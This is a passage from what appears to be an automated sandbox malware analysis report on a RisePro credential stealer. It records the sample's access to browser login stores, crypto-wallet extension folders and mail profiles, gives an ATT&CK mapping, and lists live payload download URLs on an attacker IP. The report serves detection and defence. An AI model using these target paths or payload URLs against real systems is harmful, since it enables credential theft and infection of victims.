                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\places.sqliteJump to behavior
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                          Source: Yara matchFile source: 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 1096, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 5324, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected RisePro Stealer
                          Source: Yara matchFile source: 6.3.MPGPH131.exe.1461520.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 1096, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 3632, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7216, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                          Command and Scripting Interpreter                          		11
                          Scheduled Task/Job                          		12
                          Process Injection                          		11
                          Masquerading                          		1
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services1
                          Email Collection                          		2
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts11
                          Scheduled Task/Job                          		121
                          Registry Run Keys / Startup Folder                          		11
                          Scheduled Task/Job                          		25
                          Virtualization/Sandbox Evasion                          		LSASS Memory1
                          Query Registry                          		Remote Desktop Protocol1
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		121
                          Registry Run Keys / Startup Folder                          		12
                          Process Injection                          		Security Account Manager741
                          Security Software Discovery                          		SMB/Windows Admin Shares2
                          Data from Local System                          		SteganographyAutomated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		NTDS25
                          Virtualization/Sandbox Evasion                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          Extra Window Memory Injection                          		3
                          Obfuscated Files or Information                          		LSA Secrets2
                          Process Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                          Software Packing                          		Cached Domain Credentials1
                          Application Window Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          DLL Side-Loading                          		DCSync3
                          File and Directory Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Extra Window Memory Injection                          		Proc Filesystem226
                          System Information Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1396093 Sample: I2jCDr35mu.exe Startdate: 21/02/2024 Architecture: WINDOWS Score: 100 120 Multi AV Scanner detection for domain / URL 2->120 122 Antivirus detection for URL or domain 2->122 124 Antivirus detection for dropped file 2->124 126 7 other signatures 2->126 8 I2jCDr35mu.exe 2 95 2->8         started        13 MPGPH131.exe 81 2->13         started        15 MPGPH131.exe 2->15         started        17 8 other processes 2->17 process3 dnsIp4 102 185.215.113.46 WHOLESALECONNECTIONSNL Portugal 8->102 104 34.117.186.192 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->104 106 193.233.132.62 FREE-NET-ASFREEnetEU Russian Federation 8->106 86 18 other malicious files 8->86 dropped 138 Detected unpacking (changes PE section rights) 8->138 140 Binary is likely a compiled AutoIt script file 8->140 142 Tries to steal Mail credentials (via file / registry access) 8->142 162 5 other signatures 8->162 19 idPXKSo93Tb9SEEu9e8w.exe 8->19         started        23 KFLpYwMPXjapw3SVf9HA.exe 8->23         started        25 schtasks.exe 1 8->25         started        34 3 other processes 8->34 74 C:\Users\user\...\yk50FvD1XOCg2Y2iAkjB.exe, PE32 13->74 dropped 76 C:\Users\user\...\dZPbe9okQutRw6uffMvo.exe, PE32 13->76 dropped 78 C:\Users\user\...\aCN0ucpg7A4ErZQbp9NR.exe, PE32 13->78 dropped 88 5 other malicious files 13->88 dropped 144 Multi AV Scanner detection for dropped file 13->144 146 Machine Learning detection for dropped file 13->146 148 Found many strings related to Crypto-Wallets (likely being stolen) 13->148 80 C:\Users\user\...\sy4bhhGvZ9bFDDZTr89U.exe, PE32 15->80 dropped 82 C:\Users\user\...\soOc6NhyUO7lFaV2eQJV.exe, PE32 15->82 dropped 84 C:\Users\user\...\UdgmfEtw7ukqXx7vdO3L.exe, PE32 15->84 dropped 90 10 other malicious files 15->90 dropped 150 Tries to harvest and steal browser information (history, passwords, etc) 15->150 152 Hides threads from debuggers 15->152 154 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->154 156 Antivirus detection for dropped file 17->156 158 Tries to detect sandboxes and other dynamic analysis tools (window names) 17->158 160 Tries to evade debugger and weak emulator (self modifying code) 17->160 27 firefox.exe 17->27         started        30 msedge.exe 17->30         started        32 firefox.exe 17->32         started        file5 signatures6 process7 dnsIp8 68 C:\Users\user\AppData\Local\...\explorgu.exe, PE32 19->68 dropped 128 Detected unpacking (changes PE section rights) 19->128 130 Tries to evade debugger and weak emulator (self modifying code) 19->130 132 Hides threads from debuggers 19->132 136 2 other signatures 19->136 134 Binary is likely a compiled AutoIt script file 23->134 36 chrome.exe 23->36         started        39 chrome.exe 23->39         started        41 chrome.exe 23->41         started        51 10 other processes 23->51 43 conhost.exe 25->43         started        108 142.250.176.206 GOOGLEUS United States 27->108 110 142.250.31.84 GOOGLEUS United States 27->110 116 18 other IPs or domains 27->116 70 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 27->70 dropped 72 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 27->72 dropped 53 4 other processes 27->53 112 13.107.21.239 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->112 114 13.107.246.40 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->114 118 37 other IPs or domains 30->118 45 conhost.exe 34->45         started        47 conhost.exe 34->47         started        49 conhost.exe 34->49         started        file9 signatures10 process11 dnsIp12 92 192.168.2.6 unknown unknown 36->92 94 239.255.255.250 unknown Reserved 36->94 55 chrome.exe 36->55         started        58 chrome.exe 39->58         started        60 chrome.exe 41->60         started        62 chrome.exe 51->62         started        64 msedge.exe 51->64         started        66 msedge.exe 51->66         started        process13 dnsIp14 96 13.107.42.14 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 55->96 98 144.2.9.1 LINKEDINUS Netherlands 55->98 100 29 other IPs or domains 55->100

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          I2jCDr35mu.exe39%ReversingLabsWin32.Trojan.Generic
                          I2jCDr35mu.exe42%VirustotalBrowse
                          I2jCDr35mu.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe100%AviraTR/Crypt.TPM.Gen
                          C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe100%Joe Sandbox ML
                          C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe100%Joe Sandbox ML
                          C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
                          C:\ProgramData\MPGPH131\MPGPH131.exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\RageMP131\RageMP131.exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll.tmp0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://www.youtube.com--attempting-deelevation0%URL Reputationsafe
                          https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-1520%URL Reputationsafe
                          http://x1.c.lencr.org/00%URL Reputationsafe
                          http://x1.i.lencr.org/00%URL Reputationsafe
                          http://185.215.113.46/mine/amert.exe=;5100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exeheidiMl1n683teX9h100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exetch100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/well.exePB100%Avira URL Cloudmalware
                          http://185.215.113.46/100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/plaza.exegVA100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/plaza.exee100%Avira URL Cloudmalware
                          http://185.215.113.46/21%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exe93100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/fu.exe100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/plaza.exee13%VirustotalBrowse
                          http://185.215.113.46/cost/fu.exeagertaT100%Avira URL Cloudmalware
                          http://127.0.0.1:0%Avira URL Cloudsafe
                          http://185.215.113.46/cost/ladas.exe9312%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exenBuil100%Avira URL Cloudmalware
                          https://accounts.google.comC:0%Avira URL Cloudsafe
                          http://185.215.113.46/cost/fu.exe24%VirustotalBrowse
                          http://185.215.113.46/cost/well.exe100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exeF100%Avira URL Cloudmalware
                          https://t.x0%Avira URL Cloudsafe
                          http://185.215.113.46/mine/plaza.exegVA13%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exenBuil13%VirustotalBrowse
                          http://185.215.113.46/mine/amert.exeg100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exe6100%Avira URL Cloudmalware
                          https://www.youtube.comC:0%Avira URL Cloudsafe
                          http://185.215.113.46/cost/ladas.exeF12%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exeo4H100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/amert.exeS100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exe613%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exe2100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exe1100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/amert.exeg12%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exe0100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/well.exe22%VirustotalBrowse
                          http://185.215.113.46/mine/amert.exe?100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/amert.exeS13%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exe212%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exeg100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exeppData100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exeb100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exe112%VirustotalBrowse
                          http://185.215.113.46/mine/plaza.exe100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exe013%VirustotalBrowse
                          http://185.215.113.46/mine/amert.exe4100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exeb16%VirustotalBrowse
                          http://185.215.113.46/cost/well.exe2100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exeg12%VirustotalBrowse
                          http://185.215.113.46/mine/amert.exe$100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/plaza.exeM100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/niks.exeF100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/fu.exe22100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/amert.exe412%VirustotalBrowse
                          http://185.215.113.46/mine/plaza.exe23%VirustotalBrowse
                          http://185.215.113.46/mine/plaza.exeM12%VirustotalBrowse
                          http://185.215.113.46/cost/niks.exeF16%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exex100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/amert.exe$12%VirustotalBrowse
                          http://185.215.113.46/cost/niks.exeJ100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exer100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/well.exe214%VirustotalBrowse
                          http://185.215.113.46/cost/niks.exex100%Avira URL Cloudmalware
                          http://185.215.113.46/mine/plaza.exe0100%Avira URL Cloudmalware
                          http://185.215.113.46/cost/ladas.exeppData15%VirustotalBrowse
                          http://185.215.113.46/cost/ladas.exex14%VirustotalBrowse
                          http://185.215.113.46/cost/niks.exex15%VirustotalBrowse
                          http://185.215.113.46/mine/plaza.exe016%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabI2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.46/cost/ladas.exeheidiMl1n683teX9hMPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_lfirefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecyclfirefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2512039904.000001545C195000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://json-schema.org/draft/2019-09/schema.firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://t.me/riseproRageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://spocs.getpocket.com/spocsfirefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozillfirefox.exe, 00000024.00000003.2705767411.000001545C2EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.youtube.comfirefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://mathiasbynens.be/notes/javascript-escapes#singlefirefox.exe, 00000024.00000003.3278732309.000001545501F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://shavar.services.mozilla.comfirefox.exe, 00000024.00000003.2553660970.0000015462266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2679446441.0000015462266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://completion.amazon.com/search/complete?q=firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://185.215.113.46/mine/plaza.exegVAI2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2602177921.0000000005D07000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 13%, Virustotal, Browse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://185.215.113.46/cost/ladas.exetchMPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://185.215.113.46/mine/amert.exe=;5MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000024.00000003.2682813977.00000154620E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://185.215.113.46/MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • 21%, Virustotal, Browse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://185.215.113.46/cost/well.exePBRageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://185.215.113.46/mine/plaza.exeeMPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • 13%, Virustotal, Browse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://185.215.113.46/cost/ladas.exe93I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • 12%, Virustotal, Browse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://www.youtube.com--attempting-deelevationfirefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://github.com/mozilla-services/screenshotsfirefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-deffirefox.exe, 00000024.00000003.2543948249.00000154624C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://json-schema.org/draft/2020-12/schema/=firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://185.215.113.46/cost/fu.exeMPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • 24%, Virustotal, Browse
